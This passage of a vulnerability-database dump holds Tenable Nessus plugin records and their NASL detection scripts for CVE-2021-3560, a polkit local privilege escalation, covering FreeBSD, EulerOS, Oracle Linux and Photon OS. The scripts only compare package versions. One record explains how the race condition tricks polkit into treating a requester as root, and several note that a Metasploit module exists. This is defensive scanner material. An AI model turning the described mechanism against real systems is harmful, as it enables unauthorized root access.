this by\nsending the unique bus name of the requesting process, which is\ntypically something like ':1.96', to dbus-daemon. These unique names\nare assigned and managed by dbus-daemon and cannot be forged, so this\nis a good way to check the privileges of the requesting process.\n\nThe vulnerability happens when the requesting process disconnects from\ndbus-daemon just before the call to\npolkit_system_bus_name_get_creds_sync starts. In this scenario, the\nunique bus name is no longer valid, so dbus-daemon sends back an error\nreply. This error case is handled in\npolkit_system_bus_name_get_creds_sync by setting the value of the\nerror parameter, but it still returns TRUE, rather than FALSE. This\nbehavior means that all callers of\npolkit_system_bus_name_get_creds_sync need to carefully check whether\nan error was set. If the calling function forgets to check for errors\nthen it will think that the uid of the requesting process is 0\n(because the AsyncGetBusNameCredsData struct is zero initialized). In\nother words, it will think that the action was requested by a root\nprocess, and will therefore allow it.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://seclists.org/oss-sec/2021/q2/180\");\n script_set_attribute(attribute:\"see_also\", value:\"https://gitlab.freedesktop.org/polkit/polkit/-/commit/a04d13a\");\n # https://vuxml.freebsd.org/freebsd/36a35d83-c560-11eb-84ab-e0d55e2a8bf9.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?3d4c0e75\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-3560\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Polkit D-Bus Authentication Bypass');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/06/03\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/06/04\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/06/07\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:polkit\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"polkit<0.119\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:pkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-08-15T15:59:28", "description": "According to the version of the polkit packages installed, the EulerOS installation on the remote host is affected by the following vulnerability :\n\n - polkit is a toolkit for defining and handling authorizations. It isused for allowing unprivileged processes to speak to privilegedprocesses.(CVE-2021-3560)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the EulerOS security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2021-08-10T00:00:00", "type": "nessus", "title": "EulerOS 2.0 SP8 : polkit (EulerOS-SA-2021-2311)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-3560"], "modified": "2023-05-14T00:00:00", "cpe": ["p-cpe:/a:huawei:euleros:polkit", "p-cpe:/a:huawei:euleros:polkit-devel", "p-cpe:/a:huawei:euleros:polkit-docs", "p-cpe:/a:huawei:euleros:polkit-libs", "cpe:/o:huawei:euleros:2.0"], "id": "EULEROS_SA-2021-2311.NASL", "href": "https://www.tenable.com/plugins/nessus/152407", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(152407);\n script_version(\"1.3\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/05/14\");\n\n script_cve_id(\"CVE-2021-3560\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2023/06/02\");\n\n script_name(english:\"EulerOS 2.0 SP8 : polkit (EulerOS-SA-2021-2311)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote EulerOS host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the version of the polkit packages installed, the\nEulerOS installation on the remote host is affected by the following\nvulnerability :\n\n - polkit is a toolkit for defining and handling\n authorizations. It isused for allowing unprivileged\n processes to speak to\n privilegedprocesses.(CVE-2021-3560)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n # https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2021-2311\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?cb6d1587\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected polkit package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-3560\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Polkit D-Bus Authentication Bypass');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/08/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/08/10\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:polkit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:polkit-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:polkit-docs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:polkit-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:huawei:euleros:2.0\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Huawei Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/EulerOS/release\", \"Host/EulerOS/rpm-list\", \"Host/EulerOS/sp\");\n script_exclude_keys(\"Host/EulerOS/uvp_version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/EulerOS/release\");\nif (isnull(release) || release !~ \"^EulerOS\") audit(AUDIT_OS_NOT, \"EulerOS\");\nif (release !~ \"^EulerOS release 2\\.0(\\D|$)\") audit(AUDIT_OS_NOT, \"EulerOS 2.0\");\n\nsp = get_kb_item(\"Host/EulerOS/sp\");\nif (isnull(sp) || sp !~ \"^(8)$\") audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP8\");\n\nuvp = get_kb_item(\"Host/EulerOS/uvp_version\");\nif (!empty_or_null(uvp)) audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP8\", \"EulerOS UVP \" + uvp);\n\nif (!get_kb_item(\"Host/EulerOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"aarch64\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"EulerOS\", cpu);\nif (\"aarch64\" >!< cpu) audit(AUDIT_ARCH_NOT, \"aarch64\", cpu);\n\nflag = 0;\n\npkgs = [\"polkit-0.115-2.h13.eulerosv2r8\",\n \"polkit-devel-0.115-2.h13.eulerosv2r8\",\n \"polkit-docs-0.115-2.h13.eulerosv2r8\",\n \"polkit-libs-0.115-2.h13.eulerosv2r8\"];\n\nforeach (pkg in pkgs)\n if (rpm_check(release:\"EulerOS-2.0\", sp:\"8\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"polkit\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-08-15T15:52:59", "description": "The remote Oracle Linux 8 host has packages installed that are affected by a vulnerability as referenced in the ELSA-2021-2238 advisory.\n\n - polkit: local privilege escalation using polkit_system_bus_name_get_creds_sync() (CVE-2021-3560)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2021-06-04T00:00:00", "type": "nessus", "title": "Oracle Linux 8 : polkit (ELSA-2021-2238)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-3560"], "modified": "2023-05-14T00:00:00", "cpe": ["cpe:/o:oracle:linux:8", "p-cpe:/a:oracle:linux:polkit", "p-cpe:/a:oracle:linux:polkit-devel", "p-cpe:/a:oracle:linux:polkit-docs", "p-cpe:/a:oracle:linux:polkit-libs"], "id": "ORACLELINUX_ELSA-2021-2238.NASL", "href": "https://www.tenable.com/plugins/nessus/150242", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Oracle Linux Security Advisory ELSA-2021-2238.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(150242);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/05/14\");\n\n script_cve_id(\"CVE-2021-3560\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2023/06/02\");\n\n script_name(english:\"Oracle Linux 8 : polkit (ELSA-2021-2238)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Oracle Linux host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Oracle Linux 8 host has packages installed that are affected by a vulnerability as referenced in the\nELSA-2021-2238 advisory.\n\n - polkit: local privilege escalation using polkit_system_bus_name_get_creds_sync() (CVE-2021-3560)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://linux.oracle.com/errata/ELSA-2021-2238.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-3560\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Polkit D-Bus Authentication Bypass');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/06/03\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/06/04\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/06/04\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:8\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:polkit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:polkit-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:polkit-docs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:polkit-libs\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/local_checks_enabled\");\n\n exit(0);\n}\n\n\ninclude('audit.inc');\ninclude('global_settings.inc');\ninclude('rpm.inc');\n\nif (!get_kb_item('Host/local_checks_enabled')) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item('Host/OracleLinux')) audit(AUDIT_OS_NOT, 'Oracle Linux');\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, 'Oracle Linux');\nos_ver = pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, 'Oracle Linux');\nos_ver = os_ver[1];\nif (! preg(pattern:\"^8([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, 'Oracle Linux 8', 'Oracle Linux ' + os_ver);\n\nif (!get_kb_item('Host/RedHat/rpm-list')) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'Oracle Linux', cpu);\n\npkgs = [\n {'reference':'polkit-0.115-11.0.1.el8_4.1', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'polkit-0.115-11.0.1.el8_4.1', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'polkit-devel-0.115-11.0.1.el8_4.1', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'polkit-devel-0.115-11.0.1.el8_4.1', 'cpu':'i686', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'polkit-devel-0.115-11.0.1.el8_4.1', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'polkit-docs-0.115-11.0.1.el8_4.1', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'polkit-libs-0.115-11.0.1.el8_4.1', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'polkit-libs-0.115-11.0.1.el8_4.1', 'cpu':'i686', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'polkit-libs-0.115-11.0.1.el8_4.1', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE}\n];\n\nflag = 0;\nforeach package_array ( pkgs ) {\n reference = NULL;\n release = NULL;\n sp = NULL;\n cpu = NULL;\n el_string = NULL;\n rpm_spec_vers_cmp = NULL;\n epoch = NULL;\n allowmaj = NULL;\n rpm_prefix = NULL;\n if (!empty_or_null(package_array['reference'])) reference = package_array['reference'];\n if (!empty_or_null(package_array['release'])) release = 'EL' + package_array['release'];\n if (!empty_or_null(package_array['sp'])) sp = package_array['sp'];\n if (!empty_or_null(package_array['cpu'])) cpu = package_array['cpu'];\n if (!empty_or_null(package_array['el_string'])) el_string = package_array['el_string'];\n if (!empty_or_null(package_array['rpm_spec_vers_cmp'])) rpm_spec_vers_cmp = package_array['rpm_spec_vers_cmp'];\n if (!empty_or_null(package_array['epoch'])) epoch = package_array['epoch'];\n if (!empty_or_null(package_array['allowmaj'])) allowmaj = package_array['allowmaj'];\n if (!empty_or_null(package_array['rpm_prefix'])) rpm_prefix = package_array['rpm_prefix'];\n if (reference && release) {\n if (rpm_prefix) {\n if (rpm_exists(release:release, rpm:rpm_prefix) && rpm_check(release:release, sp:sp, cpu:cpu, reference:reference, epoch:epoch, el_string:el_string, rpm_spec_vers_cmp:rpm_spec_vers_cmp, allowmaj:allowmaj)) flag++;\n } else {\n if (rpm_check(release:release, sp:sp, cpu:cpu, reference:reference, epoch:epoch, el_string:el_string, rpm_spec_vers_cmp:rpm_spec_vers_cmp, allowmaj:allowmaj)) flag++;\n }\n }\n}\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'polkit / polkit-devel / polkit-docs / etc');\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-08-02T15:09:29", "description": "According to the versions of the polkit packages installed, the EulerOS Virtualization installation on the remote host is affected by the following vulnerabilities :\n\n - It was found that polkit could be tricked into bypassing the credential checks for D-Bus requests, elevating the privileges of the requestor to the root user. This flaw could be used by an unprivileged local attacker to, for example, create a new local administrator. The highest threat from this vulnerability is to data confidentiality and integrity as well as system availability. (CVE-2021-3560)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the EulerOS security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2021-11-17T00:00:00", "type": "nessus", "title": "EulerOS Virtualization 2.9.1 : polkit (EulerOS-SA-2021-2738)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-3560"], "modified": "2023-05-14T00:00:00", "cpe": ["p-cpe:/a:huawei:euleros:polkit", "p-cpe:/a:huawei:euleros:polkit-libs", "cpe:/o:huawei:euleros:uvp:2.9.1"], "id": "EULEROS_SA-2021-2738.NASL", "href": "https://www.tenable.com/plugins/nessus/155510", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(155510);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/05/14\");\n\n script_cve_id(\"CVE-2021-3560\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2023/06/02\");\n\n script_name(english:\"EulerOS Virtualization 2.9.1 : polkit (EulerOS-SA-2021-2738)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote EulerOS Virtualization host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the versions of the polkit packages installed, the EulerOS Virtualization installation on the remote host\nis affected by the following vulnerabilities :\n\n - It was found that polkit could be tricked into bypassing the credential checks for D-Bus requests,\n elevating the privileges of the requestor to the root user. This flaw could be used by an unprivileged\n local attacker to, for example, create a new local administrator. The highest threat from this\n vulnerability is to data confidentiality and integrity as well as system availability. (CVE-2021-3560)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the EulerOS security\nadvisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional\nissues.\");\n # https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2021-2738\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?670ef6d1\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected polkit packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-3560\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Polkit D-Bus Authentication Bypass');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/06/03\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/11/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/11/17\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:polkit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:polkit-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:huawei:euleros:uvp:2.9.1\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Huawei Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/EulerOS/release\", \"Host/EulerOS/rpm-list\", \"Host/EulerOS/uvp_version\");\n\n exit(0);\n}\n\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nvar release = get_kb_item(\"Host/EulerOS/release\");\nif (isnull(release) || release !~ \"^EulerOS\") audit(AUDIT_OS_NOT, \"EulerOS\");\nvar uvp = get_kb_item(\"Host/EulerOS/uvp_version\");\nif (uvp != \"2.9.1\") audit(AUDIT_OS_NOT, \"EulerOS Virtualization 2.9.1\");\nif (!get_kb_item(\"Host/EulerOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar cpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"aarch64\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"EulerOS\", cpu);\nif (\"aarch64\" >!< cpu) audit(AUDIT_ARCH_NOT, \"aarch64\", cpu);\n\nvar flag = 0;\n\nvar pkgs = [\n \"polkit-0.116-5.h6.eulerosv2r9\",\n \"polkit-libs-0.116-5.h6.eulerosv2r9\"\n];\n\nforeach (var pkg in pkgs)\n if (rpm_check(release:\"EulerOS-2.0\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n var tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"polkit\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-08-02T14:54:38", "description": "An update of the polkit package has been released.", "cvss3": {}, "published": "2021-06-04T00:00:00", "type": "nessus", "title": "Photon OS 3.0: Polkit PHSA-2021-3.0-0248", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-3560"], "modified": "2023-05-14T00:00:00", "cpe": ["p-cpe:/a:vmware:photonos:polkit", "cpe:/o:vmware:photonos:3.0"], "id": "PHOTONOS_PHSA-2021-3_0-0248_POLKIT.NASL", "href": "https://www.tenable.com/plugins/nessus/150286", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from VMware Security Advisory PHSA-2021-3.0-0248. The text\n# itself is copyright (C) VMware, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(150286);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/05/14\");\n\n script_cve_id(\"CVE-2021-3560\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2023/06/02\");\n\n script_name(english:\"Photon OS 3.0: Polkit PHSA-2021-3.0-0248\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote PhotonOS host is missing multiple security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"An update of the polkit package has been released.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://github.com/vmware/photon/wiki/Security-Updates-3.0-248.md\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected Linux packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-3560\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Polkit D-Bus Authentication Bypass');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/06/03\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/06/04\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/06/04\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:vmware:photonos:polkit\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:vmware:photonos:3.0\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"PhotonOS Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/PhotonOS/release\", \"Host/PhotonOS/rpm-list\");\n\n exit(0);\n}\n\ninclude('audit.inc');\ninclude('global_settings.inc');\ninclude('rpm.inc');\n\nif (!get_kb_item('Host/local_checks_enabled')) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item('Host/PhotonOS/release');\nif (isnull(release) || release !~ \"^VMware Photon\") audit(AUDIT_OS_NOT, 'PhotonOS');\nif (release !~ \"^VMware Photon (?:Linux|OS) 3\\.0(\\D|$)\") audit(AUDIT_OS_NOT, 'PhotonOS 3.0');\n\nif (!get_kb_item('Host/PhotonOS/rpm-list')) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'PhotonOS', cpu);\n\nflag = 0;\n\nif (rpm_check(release:'PhotonOS-3.0', cpu:'x86_64', reference:'polkit-0.116-2.ph3')) flag++;\nif (rpm_check(release:'PhotonOS-3.0', cpu:'x86_64', reference:'polkit-devel-0.116-2.ph3')) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'polkit');\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, 